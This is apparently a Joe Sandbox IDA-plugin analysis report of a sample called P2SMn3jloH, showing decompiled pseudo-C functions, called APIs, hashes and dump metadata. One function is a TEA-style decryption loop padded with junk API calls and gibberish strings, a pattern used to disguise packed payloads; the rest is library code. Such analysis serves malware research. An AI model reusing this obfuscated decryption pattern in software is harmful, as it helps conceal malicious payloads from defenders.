                  				intOrPtr _v36;
                  				long _v40;
                  				long _v44;
                  				long _v48;
                  				long _v52;
                  				long _v56;
                  				long _v60;
                  				intOrPtr _v117;
                  				char _v1084;
                  				char _v2108;
                  				char _v3132;
                  				void _v5180;
                  				intOrPtr* _t60;
                  				unsigned int _t77;
                  				unsigned int* _t96;
                  				unsigned int _t98;
                  				unsigned int _t106;
                  				signed int _t112;
                  				signed int _t113;
                  				signed int _t115;
                  
                  				_v117 = _v117 + __edx;
                  				E004084E0(0x1438);
                  				_t96 = _a4;
                  				_t98 =  *_t96;
                  				_v12 = _t96[1];
                  				_t60 = _a8;
                  				_v36 =  *_t60;
                  				_v28 =  *((intOrPtr*)(_t60 + 4));
                  				_a4 = _t98;
                  				_v16 = 0xc6ef3720;
                  				_v32 =  *((intOrPtr*)(_t60 + 8));
                  				_v24 =  *((intOrPtr*)(_t60 + 0xc));
                  				_v20 = 0x20;
                  				while(1) {
                  					_t112 = _t98 << 4;
                  					if( *0x588f80 == 5) {
                  						__imp__GetConsoleAliasExesLengthW();
                  						_t98 = _a4;
                  					}
                  					_t113 = _t112 + _v32;
                  					_t63 = _v16 + _t98;
                  					_a8 = _v16 + _t98;
                  					_v8 = _t98 >> 5;
                  					if( *0x588f80 == 0x1b) {
                  						CopyFileExA("Viwexisohoxopuv jozux", "Hokijifuyoh", 0, 0, 0, 0);
                  						GetTickCount();
                  						InterlockedExchange( &_v40, 0);
                  						LocalSize(0);
                  						_t63 = _a8;
                  					}
                  					_v8 = _v8 + _v24;
                  					 *0x583900 = 0;
                  					E00404FC5(_v24,  &_v8, _t63 ^ _t113);
                  					E00404FA7( &_v12, _v8);
                  					_t115 = _v12 << 4;
                  					if( *0x588f80 == 0x78c) {
                  						GetComputerNameA( &_v1084,  &_v48);
                  						GetVolumeInformationA("vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu",  &_v2108, 0,  &_v52,  &_v56,  &_v60,  &_v3132, 0);
                  						WriteConsoleW(0,  &_v5180, 0,  &_v44, 0);
                  					}
                  					_a8 = _v12 + _v16;
                  					_t106 = _v12;
                  					 *0x58390c =  *0x58390c | 0xffffffff;
                  					 *0x583908 = 0xff6b3619;
                  					_v8 = _t115 + _v36 ^ (_t106 >> 0x00000005) + _v28 ^ _a8;
                  					_a4 = _a4 - _v8;
                  					E00404F98( &_v16, 0x9e3779b9);
                  					_t53 =  &_v20;
                  					 *_t53 = _v20 - 1;
                  					if( *_t53 != 0) {
                  						_t98 = _a4;
                  						continue;
                  					}
                  					_t77 = _a4;
                  					 *_t96 = _t77;
                  					_t96[1] = _t106;
                  					return _t77;
                  				}
                  			}






























                  0x0040501a
                  0x00405023
                  0x00405029
                  0x0040502f
                  0x00405031
                  0x00405034
                  0x00405039
                  0x0040503f
                  0x0040504a
                  0x0040504d
                  0x00405054
                  0x00405057
                  0x0040505a
                  0x00405068
                  0x0040506a
                  0x00405074
                  0x00405076
                  0x0040507c
                  0x0040507c
                  0x00405082
                  0x00405085
                  0x00405091
                  0x00405094
                  0x00405097
                  0x004050a7
                  0x004050ad
                  0x004050b8
                  0x004050bf
                  0x004050c5
                  0x004050c5
                  0x004050cb
                  0x004050d5
                  0x004050db
                  0x004050e7
                  0x004050ef
                  0x004050fc
                  0x00405109
                  0x00405130
                  0x00405144
                  0x00405144
                  0x00405150
                  0x00405153
                  0x00405159
                  0x0040516f
                  0x00405179
                  0x0040517f
                  0x0040518b
                  0x00405190
                  0x00405190
                  0x00405193
                  0x00405065
                  0x00000000
                  0x00405065
                  0x00405199
                  0x0040519e
                  0x004051a0
                  0x004051a5
                  0x004051a5

                  APIs
                  • GetConsoleAliasExesLengthW.KERNEL32 ref: 00405076
                  • CopyFileExA.KERNEL32(Viwexisohoxopuv jozux,Hokijifuyoh,00000000,00000000,00000000,00000000), ref: 004050A7
                  • GetTickCount.KERNEL32 ref: 004050AD
                  • InterlockedExchange.KERNEL32(?,00000000), ref: 004050B8
                  • LocalSize.KERNEL32 ref: 004050BF
                  • GetComputerNameA.KERNEL32 ref: 00405109
                  • GetVolumeInformationA.KERNEL32(vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu,?,00000000,?,?,?,?,00000000), ref: 00405130
                  • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00405144
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: Console$AliasComputerCopyCountExchangeExesFileInformationInterlockedLengthLocalNameSizeTickVolumeWrite
                  • String ID: $Hokijifuyoh$Viwexisohoxopuv jozux$vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu
                  • API String ID: 939497775-455562230
                  • Opcode ID: 76d2e514d146a04c526660f1a1346bda9669b2d8e2a44e6e8d8f8a859ef879cf
                  • Instruction ID: b458645b5a5c2dc041ceb989f8648661d7a1c80406c0133357f5a6f26ebf32f6
                  • Opcode Fuzzy Hash: 76d2e514d146a04c526660f1a1346bda9669b2d8e2a44e6e8d8f8a859ef879cf
                  • Instruction Fuzzy Hash: 0E51F676900218EFCB10DF99D9849DEBBB8FF89310B10816AF915F7260D734AA44DFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0040DD43(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t23;
                  				intOrPtr _t28;
                  				intOrPtr _t32;
                  				intOrPtr _t45;
                  				void* _t46;
                  
                  				_t35 = __ebx;
                  				_push(0xc);
                  				_push(0x41e4d0);
                  				E0040EF38(__ebx, __edi, __esi);
                  				_t44 = L"KERNEL32.DLL";
                  				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                  				if(_t23 == 0) {
                  					_t23 = E0040F431(_t44);
                  				}
                  				 *(_t46 - 0x1c) = _t23;
                  				_t45 =  *((intOrPtr*)(_t46 + 8));
                  				 *((intOrPtr*)(_t45 + 0x5c)) = 0x403010;
                  				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                  				if(_t23 != 0) {
                  					_t35 = GetProcAddress;
                  					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                  					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                  				}
                  				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                  				 *((char*)(_t45 + 0xc8)) = 0x43;
                  				 *((char*)(_t45 + 0x14b)) = 0x43;
                  				 *(_t45 + 0x68) = 0x430cd0;
                  				E0040E43F(_t35, 1, 0xd);
                  				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                  				InterlockedIncrement( *(_t45 + 0x68));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				E0040DE18();
                  				E0040E43F(_t35, 1, 0xc);
                  				 *(_t46 - 4) = 1;
                  				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                  				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                  				if(_t28 == 0) {
                  					_t32 =  *0x4312d8; // 0x431200
                  					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                  				}
                  				E0040A5E0( *((intOrPtr*)(_t45 + 0x6c)));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				return E0040EF7D(E0040DE21());
                  			}








                  0x0040dd43
                  0x0040dd43
                  0x0040dd45
                  0x0040dd4a
                  0x0040dd4f
                  0x0040dd55
                  0x0040dd5d
                  0x0040dd60
                  0x0040dd65
                  0x0040dd66
                  0x0040dd69
                  0x0040dd6c
                  0x0040dd76
                  0x0040dd7b
                  0x0040dd83
                  0x0040dd8b
                  0x0040dd9b
                  0x0040dd9b
                  0x0040dda1
                  0x0040dda4
                  0x0040ddab
                  0x0040ddb2
                  0x0040ddbb
                  0x0040ddc1
                  0x0040ddc8
                  0x0040ddce
                  0x0040ddd5
                  0x0040dddc
                  0x0040dde2
                  0x0040dde5
                  0x0040dde8
                  0x0040dded
                  0x0040ddef
                  0x0040ddf4
                  0x0040ddf4
                  0x0040ddfa
                  0x0040de00
                  0x0040de11

                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041E4D0,0000000C,0040DE7E,00000000,00000000,?,?,0040B791,0040B5BF,00000001,?,0040807B,00000001,?), ref: 0040DD55
                  • __crt_waiting_on_module_handle.LIBCMT ref: 0040DD60
                    • Part of subcall function 0040F431: Sleep.KERNEL32(000003E8,?,?,0040DCA6,KERNEL32.DLL,?,0040E27B,?,0040B5B9,?,00000001,?,0040807B,00000001,?), ref: 0040F43D
                    • Part of subcall function 0040F431: GetModuleHandleW.KERNEL32(?,?,?,0040DCA6,KERNEL32.DLL,?,0040E27B,?,0040B5B9,?,00000001,?,0040807B,00000001,?), ref: 0040F446
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040DD89
                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040DD99
                  • __lock.LIBCMT ref: 0040DDBB
                  • InterlockedIncrement.KERNEL32(00430CD0), ref: 0040DDC8
                  • __lock.LIBCMT ref: 0040DDDC
                  • ___addlocaleref.LIBCMT ref: 0040DDFA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-2843748187
                  • Opcode ID: 7a28d9df0d79a8e46aaea5635bab356b9422339ca1f83094fd59ec47a5d99364
                  • Instruction ID: 9cbef10d2a4af3273987d8409bbbf66332b745a71d92fbc2e00b1abfa944f32f
                  • Opcode Fuzzy Hash: 7a28d9df0d79a8e46aaea5635bab356b9422339ca1f83094fd59ec47a5d99364
                  • Instruction Fuzzy Hash: 1E117571900701AFD720AF76D905B9ABBE0AF04318F10853FE495B76E1CB7899458B5C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E004071C1(void* __eflags) {
                  				intOrPtr _t40;
                  				intOrPtr _t43;
                  				void* _t45;
                  
                  				E004088F4(E0041BA17, _t45);
                  				E004078F4(_t45 - 0x14, 0);
                  				_t43 =  *0x588f88;
                  				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
                  				 *((intOrPtr*)(_t45 - 0x10)) = _t43;
                  				_t40 = E00404E01( *((intOrPtr*)(_t45 + 8)), E00404CFA(0x589004));
                  				if(_t40 == 0) {
                  					if(_t43 == 0) {
                  						_push( *((intOrPtr*)(_t45 + 8)));
                  						_push(_t45 - 0x10);
                  						if(E0040700B() == 0xffffffff) {
                  							E00408143(_t45 - 0x20, "bad cast");
                  							E00408993(_t45 - 0x20, 0x41df20);
                  						}
                  						_t40 =  *((intOrPtr*)(_t45 - 0x10));
                  						 *0x588f88 = _t40;
                  						E00404D2F(_t40);
                  						E00404D92();
                  					} else {
                  						_t40 = _t43;
                  					}
                  				}
                  				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
                  				E0040791C(_t45 - 0x14);
                  				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                  				return _t40;
                  			}






                  0x004071c6
                  0x004071d5
                  0x004071da
                  0x004071e0
                  0x004071e9
                  0x004071fa
                  0x004071fe
                  0x00407202
                  0x00407208
                  0x0040720e
                  0x00407219
                  0x00407223
                  0x00407231
                  0x00407231
                  0x00407236
                  0x0040723b
                  0x00407241
                  0x00407248
                  0x00407204
                  0x00407204
                  0x00407204
                  0x00407202
                  0x0040724d
                  0x00407254
                  0x00407260
                  0x00407268

                  APIs
                  • __EH_prolog.LIBCMT ref: 004071C6
                  • std::_Lockit::_Lockit.LIBCPMT ref: 004071D5
                  • int.LIBCPMT ref: 004071EC
                    • Part of subcall function 00404CFA: std::_Lockit::_Lockit.LIBCPMT ref: 00404D0B
                  • std::bad_exception::bad_exception.LIBCMT ref: 00407223
                  • __CxxThrowException@8.LIBCMT ref: 00407231
                  • std::locale::facet::_Incref.LIBCPMT ref: 00407241
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8H_prologIncrefThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                  • String ID: bad cast
                  • API String ID: 2140829718-3145022300
                  • Opcode ID: ddbadce34899ec9c52f17dabb64b652c7e92ee8fd94eb73b687b0beb61dc9c4f
                  • Instruction ID: f94f7b4a95d8708b41945feee4cca53b4db56b23a313fed7911fafdba3c045d2
                  • Opcode Fuzzy Hash: ddbadce34899ec9c52f17dabb64b652c7e92ee8fd94eb73b687b0beb61dc9c4f
                  • Instruction Fuzzy Hash: C2119172E0011497CB15EB65C812ABEB735AF80328F54053FF521772D1DF38AA05D799
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E00407288(void* __ecx, void* __edi) {
                  				signed int _t25;
                  				void* _t29;
                  				signed char _t38;
                  				void* _t43;
                  				void* _t44;
                  
                  				_t43 = __edi;
                  				E004088F4(E0041BA39, _t44);
                  				_t25 =  *(_t44 + 8) & 0x00000017;
                  				 *(__ecx + 8) = _t25;
                  				_t38 =  *(__ecx + 0xc) & _t25;
                  				if(_t38 != 0) {
                  					if( *((intOrPtr*)(_t44 + 0xc)) == 0) {
                  						L4:
                  						if((_t38 & 0x00000004) == 0) {
                  							_push(2);
                  							_pop(0);
                  							if((0 & _t38) == 0) {
                  								E004070F9(_t44 - 0x6c, _t43, "ios_base::eofbit set");
                  								_t38 = _t44 - 0x94;
                  								 *((intOrPtr*)(_t44 - 4)) = 0;
                  								E004070B4(_t38, _t44 - 0x6c);
                  								_push(0x41df84);
                  								_t29 = _t44 - 0x94;
                  								L7:
                  								_push(_t29);
                  								L3:
                  								E00408993();
                  								goto L4;
                  							}
                  							E004070F9(_t44 - 0x28, _t43, "ios_base::failbit set");
                  							 *((intOrPtr*)(_t44 - 4)) = 1;
                  							L6:
                  							_t38 = _t44 - 0x50;
                  							E004070B4(_t38, _t44 - 0x28);
                  							_push(0x41df84);
                  							_t29 = _t44 - 0x50;
                  							goto L7;
                  						}
                  						E004070F9(_t44 - 0x28, _t43, "ios_base::badbit set");
                  						 *((intOrPtr*)(_t44 - 4)) = 0;
                  						goto L6;
                  					}
                  					_push(0);
                  					_push(0);
                  					goto L3;
                  				}
                  				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
                  				return _t25;
                  			}








                  0x00407288
                  0x0040728d
                  0x00407295
                  0x00407298
                  0x004072a4
                  0x004072a6
                  0x004072b1
                  0x004072ba
                  0x004072bd
                  0x004072e6
                  0x004072e8
                  0x004072eb
                  0x0040730b
                  0x00407314
                  0x0040731a
                  0x0040731d
                  0x00407322
                  0x00407327
                  0x004072e3
                  0x004072e3
                  0x004072b5
                  0x004072b5
                  0x00000000
                  0x004072b5
                  0x004072f5
                  0x004072fa
                  0x004072cf
                  0x004072d3
                  0x004072d6
                  0x004072db
                  0x004072e0
                  0x00000000
                  0x004072e0
                  0x004072c7
                  0x004072cc
                  0x00000000
                  0x004072cc
                  0x004072b3
                  0x004072b4
                  0x00000000
                  0x004072b4
                  0x00407332
                  0x0040733a

                  APIs
                  • __EH_prolog.LIBCMT ref: 0040728D
                  • __CxxThrowException@8.LIBCMT ref: 004072B5
                  • std::bad_exception::bad_exception.LIBCMT ref: 004072D6
                  • std::bad_exception::bad_exception.LIBCMT ref: 0040731D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: std::bad_exception::bad_exception$Exception@8H_prologThrow
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 965843388-1866435925
                  • Opcode ID: 1f9409369e8275f9faae0972c405873c5af8ee8627cb4b720766c5d04627b7a8
                  • Instruction ID: 97ee43fe21d49277692d76a3ac49be31411882ee5d05a5a9bf490be4ce5210e1
                  • Opcode Fuzzy Hash: 1f9409369e8275f9faae0972c405873c5af8ee8627cb4b720766c5d04627b7a8
                  • Instruction Fuzzy Hash: AF115171D48248AAC714EFA4C992FEDB774AB10308F14807FA5067B1C2DB7C6A49DB1A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E004051A8(unsigned int _a4, unsigned int _a8, signed int _a12) {
                  				unsigned int _t5;
                  				void* _t6;
                  				unsigned int _t11;
                  				unsigned int _t14;
                  
                  				if( *0x588f80 == 0x516) {
                  					__imp__MoveFileWithProgressA("lowahopaxepo", "cufahowir", 0, 0, 0);
                  				}
                  				_t5 = _a8 >> 3;
                  				if(_t5 > 0) {
                  					_t14 = _a4;
                  					_t11 = _t5;
                  					do {
                  						if( *0x588f80 == 0xb7d) {
                  							CopyFileExA(0, 0, 0, 0, 0, 0);
                  						}
                  						if( *0x588f80 == 0x1c) {
                  							TlsGetValue(0);
                  							EnumSystemCodePagesA(0, 0);
                  						}
                  						_t6 = E0040501B(_t14, _a12);
                  						_t14 = _t14 + 8;
                  						_t11 = _t11 - 1;
                  					} while (_t11 != 0);
                  					return _t6;
                  				}
                  				return _t5;
                  			}







                  0x004051b8
                  0x004051c7
                  0x004051c7
                  0x004051d0
                  0x004051d5
                  0x004051d9
                  0x004051dc
                  0x004051de
                  0x004051e8
                  0x004051f0
                  0x004051f0
                  0x004051fd
                  0x00405200
                  0x00405208
                  0x00405208
                  0x00405212
                  0x00405217
                  0x0040521a
                  0x0040521a
                  0x00000000
                  0x0040521e
                  0x00405221

                  APIs
                  • MoveFileWithProgressA.KERNEL32 ref: 004051C7
                  • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004051F0
                  • TlsGetValue.KERNEL32(00000000), ref: 00405200
                  • EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 00405208
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: File$CodeCopyEnumMovePagesProgressSystemValueWith
                  • String ID: cufahowir$lowahopaxepo
                  • API String ID: 1094414278-940798668
                  • Opcode ID: 6980798557b2102f562a45582d2b0bdc7ffbd34901eda9920b71f48b31dee8aa
                  • Instruction ID: edb5c119685e2f8bf480780b49142d10d3bd3aaeb667a99e0e25aafd651fd6e9
                  • Opcode Fuzzy Hash: 6980798557b2102f562a45582d2b0bdc7ffbd34901eda9920b71f48b31dee8aa
                  • Instruction Fuzzy Hash: 51F0C831901528B7D7205F519D08D9F7B6CFF993A57400136FA04B15A0C7384481DFBC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040D283(intOrPtr __ecx) {
                  				void* _t47;
                  				intOrPtr _t48;
                  				void* _t53;
                  				void* _t54;
                  				void* _t56;
                  				intOrPtr _t57;
                  				void* _t58;
                  				void* _t61;
                  
                  				_push(0x2c);
                  				_push(0x41e430);
                  				E0040EF38(_t47, _t54, _t56);
                  				_t48 = __ecx;
                  				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                  				_t57 =  *((intOrPtr*)(_t58 + 8));
                  				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                  				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                  				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                  				 *((intOrPtr*)(_t58 - 0x28)) = E004087EC(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                  				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040DEA3(__ecx, _t53, _t61) + 0x88));
                  				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040DEA3(_t48, _t53, _t61) + 0x8c));
                  				 *((intOrPtr*)(E0040DEA3(_t48, _t53, _t61) + 0x88)) = _t57;
                  				 *((intOrPtr*)(E0040DEA3(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                  				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                  				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                  				 *(_t58 - 4) = 1;
                  				 *((intOrPtr*)(_t58 - 0x1c)) = E00408891(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                  				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                  				 *(_t58 - 4) = 0xfffffffe;
                  				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                  				E0040D3A9(_t48, _t55, _t57);
                  				return E0040EF7D( *((intOrPtr*)(_t58 - 0x1c)));
                  			}











                  0x0040d283
                  0x0040d285
                  0x0040d28a
                  0x0040d28f
                  0x0040d291
                  0x0040d294
                  0x0040d297
                  0x0040d29a
                  0x0040d2a1
                  0x0040d2b2
                  0x0040d2c0
                  0x0040d2ce
                  0x0040d2d6
                  0x0040d2e4
                  0x0040d2ea
                  0x0040d2f1
                  0x0040d2f4
                  0x0040d30a
                  0x0040d30d
                  0x0040d382
                  0x0040d389
                  0x0040d390
                  0x0040d39d

                  APIs
                  • __CreateFrameInfo.LIBCMT ref: 0040D2AB
                    • Part of subcall function 004087EC: __getptd.LIBCMT ref: 004087FA
                    • Part of subcall function 004087EC: __getptd.LIBCMT ref: 00408808
                  • __getptd.LIBCMT ref: 0040D2B5
                    • Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
                    • Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3
                  • __getptd.LIBCMT ref: 0040D2C3
                  • __getptd.LIBCMT ref: 0040D2D1
                  • __getptd.LIBCMT ref: 0040D2DC
                  • _CallCatchBlock2.LIBCMT ref: 0040D302
                    • Part of subcall function 00408891: __CallSettingFrame@12.LIBCMT ref: 004088DD
                    • Part of subcall function 0040D3A9: __getptd.LIBCMT ref: 0040D3B8
                    • Part of subcall function 0040D3A9: __getptd.LIBCMT ref: 0040D3C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                  • String ID:
                  • API String ID: 1602911419-0
                  • Opcode ID: fdb54817555d764e123fedf5d2765495e1d6fe838cf628365064930c0acc2dda
                  • Instruction ID: ae52302a46f3c4effc3c6ab00d3fd4dbe04edd1ea2b168d13cbfd4d74c9cb38f
                  • Opcode Fuzzy Hash: fdb54817555d764e123fedf5d2765495e1d6fe838cf628365064930c0acc2dda
                  • Instruction Fuzzy Hash: 5411E7B1C1420A9FDB00EFA5C545B9D77B0BF04318F50846AF854AB291DB7C9A159B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0040892E(char _a4) {
                  				signed int _v16;
                  				char _v20;
                  				long _v24;
                  				signed int _v32;
                  				void* _v36;
                  				long _v40;
                  				void _v60;
                  				void* __edi;
                  				void* _t20;
                  				signed int _t21;
                  				signed int _t26;
                  				DWORD* _t27;
                  				void* _t30;
                  				signed int _t34;
                  				void* _t38;
                  
                  				while(1) {
                  					_t2 =  &_a4; // 0x405c25
                  					_t20 = E0040B500(_t30, _t38,  *_t2);
                  					if(_t20 != 0) {
                  						break;
                  					}
                  					_t21 = E0040E26B(_a4);
                  					__eflags = _t21;
                  					if(_t21 == 0) {
                  						__eflags =  *0x5890c0 & 0x00000001;
                  						if(( *0x5890c0 & 0x00000001) == 0) {
                  							 *0x5890c0 =  *0x5890c0 | 0x00000001;
                  							__eflags =  *0x5890c0;
                  							E00408913(0x5890b4);
                  							E00408F48( *0x5890c0, 0x41bc3a);
                  						}
                  						E00405C4F( &_v16, 0x5890b4);
                  						_push(0x41dc84);
                  						_push( &_v16);
                  						L7();
                  						asm("int3");
                  						_push(0x5890b4);
                  						_push(_t38);
                  						_t34 = 8;
                  						_v36 = memcpy( &_v60, 0x40164c, _t34 << 2);
                  						_t26 = _v16;
                  						_v32 = _t26;
                  						__eflags = _t26;
                  						if(_t26 != 0) {
                  							__eflags =  *_t26 & 0x00000008;
                  							if(( *_t26 & 0x00000008) != 0) {
                  								_v20 = 0x1994000;
                  							}
                  						}
                  						_t27 =  &_v20;
                  						RaiseException(_v40, _v36, _v24, _t27);
                  						return _t27;
                  					} else {
                  						continue;
                  					}
                  					L11:
                  				}
                  				return _t20;
                  				goto L11;
                  			}


















                  0x00408945
                  0x00408945
                  0x00408948
                  0x00408950
                  0x00000000
                  0x00000000
                  0x0040893b
                  0x00408941
                  0x00408943
                  0x00408954
                  0x00408960
                  0x00408962
                  0x00408962
                  0x0040896b
                  0x00408975
                  0x0040897a
                  0x0040897f
                  0x00408984
                  0x0040898c
                  0x0040898d
                  0x00408992
                  0x0040899e
                  0x0040899f
                  0x004089a2
                  0x004089ad
                  0x004089b0
